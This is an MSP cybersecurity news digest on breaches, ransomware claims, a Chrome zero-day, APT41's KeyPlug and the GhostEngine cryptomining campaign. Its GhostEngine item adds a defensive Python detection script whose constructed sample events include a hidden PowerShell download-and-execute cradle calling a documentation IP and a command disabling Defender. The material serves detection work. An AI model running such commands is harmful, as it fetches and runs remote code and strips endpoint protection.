MSP cybersecurity news digest, June 3, 2024

Sav-Rx discloses data breach impacting 2.8 million Americans and BlackBasta ransomware group claims another US victim  

Prescription management company Sav-Rx, with a revenue of approximately $10 million in 2023, has notified over 2.8 million people in the United States that their personal data was stolen in a 2023 cyberattack.

Sav-Rx detected a network interruption, said it secured its systems and engaged third-party cybersecurity experts. Its IT systems were restored the next day with no delay in prescription shipments, but the investigation took almost eight months before notifications went out. The stolen data includes names, dates of birth, Social Security Numbers, and insurance information. Sav-Rx says it has no evidence that the data has been misused, but urges affected individuals to monitor their credit and enroll in identity theft protection services. Because Social Security Numbers were exposed, a credit freeze is a stronger control than monitoring alone, and "no evidence of misuse" only means that none has been observed yet.

In a separate case, the BlackBasta ransomware group has added Atlas, a major U.S. fuel distributor, to the victim list on its Tor leak site. The group claims to have stolen 730 GB of data, including corporate and employee information, and has published documents such as ID cards and payroll requests as proof. Atlas has not publicly confirmed the incident, and leak-site claims should be treated as unverified until the victim or investigators confirm them.

Western Sydney University data breach exposed student data

Western Sydney University (WSU) has alerted students and staff about a data breach affecting its Microsoft 365 and SharePoint environment.

The breach was discovered in January 2024, but the investigation found unauthorized access dating back to May 17, 2023, a dwell time of roughly eight months, affecting email and SharePoint files. The incident may also have involved the University's Solar Car Laboratory infrastructure. Approximately 7,500 individuals are affected and will receive personalized notifications.

WSU says it has not received any threats or extortion demands and that core operations remain unaffected.

GhostEngine mining attacks kill EDR security using vulnerable drivers

A cryptomining campaign tracked as 'REF4578' has been deploying GhostEngine, a malicious payload that loads known-vulnerable signed drivers (a bring-your-own-vulnerable-driver, or BYOVD, technique) to disable security products before installing an XMRig miner.

The intrusion begins with an executable named 'Tiworker.exe' (the name of the legitimate Windows Modules Installer Worker, which the malware imitates) that downloads a PowerShell script from the attacker's C2 server; that script is GhostEngine's primary loader. It disables Windows Defender, creates scheduled tasks for persistence, and launches 'smartscreen.exe', again named after a legitimate Windows binary, which uses the vulnerable drivers to terminate EDR processes and then starts cryptocurrency mining.

Defenders should watch for suspicious PowerShell activity (download cradles, Set-MpPreference calls that disable Defender features, scheduled-task creation), processes that carry Windows binary names but run from non-standard paths, driver loads from user-writable directories, and network traffic to cryptomining pools. Block the creation and loading of known vulnerable driver files, for example by enabling Microsoft's vulnerable driver blocklist where the platform supports it.
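
The following is an added example, not code from the original digest or from any vendor's report: a small triage pass that applies the detection guidance above to constructed endpoint telemetry. The event format, the stratum port list, the pool-hostname regex and the alert threshold are assumptions for illustration; the sample events are constructed, not real captures.

```python
"""Toy triage of GhostEngine-style activity over constructed endpoint telemetry.

Added example for illustration; event shape, ports, regexes and threshold are assumptions.
"""
import re

# Stratum ports commonly used by XMRig-style miners (assumption; tune per environment).
MINING_PORTS = {3333, 4444, 5555, 7777, 14444}
# Crude hostname heuristic for pool traffic; a real deployment would use a threat feed.
POOL_HOST_RE = re.compile(r"(pool|xmr|monero|mining)", re.I)
# Defender tampering via Set-MpPreference -Disable*, e.g. -DisableRealtimeMonitoring.
DEFENDER_TAMPER_RE = re.compile(r"Set-MpPreference\b.*-Disable\w+", re.I)
# Download cradles typically seen in PowerShell loaders.
DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
SYSTEM32 = "c:\\windows\\system32\\"
DRIVERS_DIR = SYSTEM32 + "drivers\\"


def analyze_event(ev):
    """Return the list of detection names that fire for one event dict."""
    hits = []
    kind = ev.get("type")
    image = ev.get("image", "").lower()
    if kind == "process":
        parent = ev.get("parent_image", "").lower()
        cmd = ev.get("cmdline", "")
        if image.endswith("powershell.exe"):
            if DOWNLOAD_RE.search(cmd):
                hits.append("powershell_download_cradle")
            if DEFENDER_TAMPER_RE.search(cmd):
                hits.append("defender_tamper")
            # The campaign's first stage is dropped as Tiworker.exe; the real
            # Windows Modules Installer Worker never spawns a download cradle.
            if parent.endswith("tiworker.exe"):
                hits.append("powershell_child_of_tiworker")
        if image.endswith("schtasks.exe") and "/create" in cmd.lower():
            hits.append("scheduled_task_created")
        # smartscreen.exe outside System32 is masquerading, not the Windows binary.
        if image.endswith("smartscreen.exe") and not image.startswith(SYSTEM32):
            hits.append("masqueraded_smartscreen")
    elif kind == "driver_load":
        # BYOVD payloads drop the vulnerable driver in a writable directory first.
        if not image.startswith(DRIVERS_DIR):
            hits.append("driver_loaded_outside_drivers_dir")
    elif kind == "network":
        if ev.get("dst_port") in MINING_PORTS or POOL_HOST_RE.search(ev.get("dst_host", "")):
            hits.append("mining_pool_traffic")
    return hits


def triage(events):
    """Group distinct detections per host."""
    per_host = {}
    for ev in events:
        for hit in analyze_event(ev):
            per_host.setdefault(ev["host"], set()).add(hit)
    return {h: sorted(v) for h, v in per_host.items()}


def alert_hosts(events, min_detections=3):
    """Hosts where enough independent signals line up to justify an alert.
    Any single signal (one scheduled task, one pool-looking hostname) is noisy;
    several stages of the same chain on one host are not."""
    return sorted(h for h, hits in triage(events).items() if len(hits) >= min_detections)


# Constructed sample telemetry (not real captures). 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Users\\Public\\Tiworker.exe",
     "cmdline": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/loader.ps1')\""},
    {"type": "process", "host": "ws01",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"type": "process", "host": "ws01", "image": "C:\\Windows\\System32\\schtasks.exe",
     "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "schtasks /create /tn SystemUpdateCheck /tr C:\\ProgramData\\Microsoft\\smartscreen.exe /sc minute /mo 20"},
    {"type": "process", "host": "ws01", "image": "C:\\ProgramData\\Microsoft\\smartscreen.exe",
     "parent_image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "smartscreen.exe"},
    {"type": "driver_load", "host": "ws01", "image": "C:\\Windows\\Temp\\dropped.sys"},
    {"type": "network", "host": "ws01", "dst_host": "pool.example-xmr.test", "dst_port": 3333},
    # Benign host: the real smartscreen.exe and ordinary HTTPS traffic must not fire.
    {"type": "process", "host": "ws02", "image": "C:\\Windows\\System32\\smartscreen.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "smartscreen.exe"},
    {"type": "network", "host": "ws02", "dst_host": "www.example.com", "dst_port": 443},
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(host, hits)
    print("alert:", alert_hosts(SAMPLE_EVENTS))
```

The point of the threshold in alert_hosts is that each signal on its own is common in a fleet (admins create scheduled tasks, third-party drivers load from odd places), while the combination of a download cradle, Defender tampering, a masqueraded binary, a stray driver load and pool traffic on one host is the chain described above and is worth an analyst's time.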

Google fixes eighth actively exploited Chrome zero-day vulnerability this year

Google has released an emergency security update for the eighth actively exploited Chrome zero-day vulnerability of the year.

Discovered internally by Google, the high-severity 'type confusion' vulnerability in the V8 JavaScript engine is tracked as CVE-2024-5274. Type confusion in V8 can lead to crashes and memory corruption and, in practice, to arbitrary code execution in the renderer, and Google says an exploit exists in the wild. The update is rolling out on Chrome's Stable channel for Windows, Mac and Linux; the fix only takes effect after the browser is relaunched (chrome://settings/help triggers the update and shows the installed version). Other Chromium-based browsers such as Edge, Brave and Opera receive the V8 fix only when their own vendors ship it, so patch those separately.

This is the fourth actively exploited zero-day vulnerability fixed in Chrome in May 2024 alone, after CVE-2024-4671, CVE-2024-4761 and CVE-2024-4947, which underlines how quickly browser patches need to reach endpoints.

APT41: The threat of KeyPlug against Italian industries

Researchers uncovered a backdoor known as KeyPlug that had been targeting various Italian industries for months.

KeyPlug has both Windows and Linux variants and can use several C2 protocols (HTTP, TCP, KCP over UDP and WebSocket), with the protocol selected by the sample's configuration. The Windows variant uses a .NET loader to decrypt and execute the payload, while the Linux variant is packed with VMProtect, which unpacks the payload at run time.

The backdoor is attributed to APT41, which researchers have identified as a Chinese state-sponsored espionage group that also conducts financially motivated operations.